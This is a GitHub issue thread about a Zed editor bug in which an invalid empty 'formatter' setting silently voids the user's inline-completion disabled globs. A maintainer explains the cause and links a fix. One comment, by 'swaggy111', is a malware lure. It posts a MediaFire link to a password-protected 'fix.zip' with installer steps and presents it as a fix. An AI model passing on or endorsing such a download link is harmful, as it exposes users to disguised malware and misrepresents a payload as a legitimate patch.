### ISSUE TITLE
Adding an unrelated formatter section in settings turns on inline completions

### ISSUE THREAD

**Issue by EdAyers** [zed-industries/zed#16876]
### Check for existing issues

- [X] Completed

### Describe the bug / provide steps to reproduce it

This is my settings file (~/.config/zed):
```json
{
  "inline_completions": {
    "disabled_globs": [".env", "*.md"]
  }
}
```

In this case, completions are correctly disabled for markdown files (I can see the copilot icon in the status bar has a line through it).

Now if I change the settings to the following

```json
{
  "inline_completions": {
    "disabled_globs": [".env", "*.md"]
  },
  "languages": {
    "Python": {
      "formatter": {}
    }
  }
}

```

Copilot is enabled in all of my markdown files (even blank ones with no embedded python code blocks). If `formatter` dict is removed then inline completions are disabled again.

Some related issues:
- https://github.com/zed-industries/zed/issues/7209 
- https://github.com/zed-industries/zed/issues/4338
- https://github.com/zed-industries/zed/issues/9335

I suspect this is the root cause of #7209, but hard to tell.

### Environment

Zed: v0.149.5 (Zed)
OS: macOS 14.6.1
Memory: 24 GiB
Architecture: aarch64

### If applicable, attach your Zed.log file to this issue.

nothing relevant in the logs

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mrnugget** [comment]
Yeah, the problem is that `"formatter": {}` is not valid and it makes your settings invalid, which means the disabled globs are ignored.

The bigger problem is that we don't surface this in any way.

**Comment by mrnugget** [comment]
See: https://github.com/zed-industries/zed/pull/18122
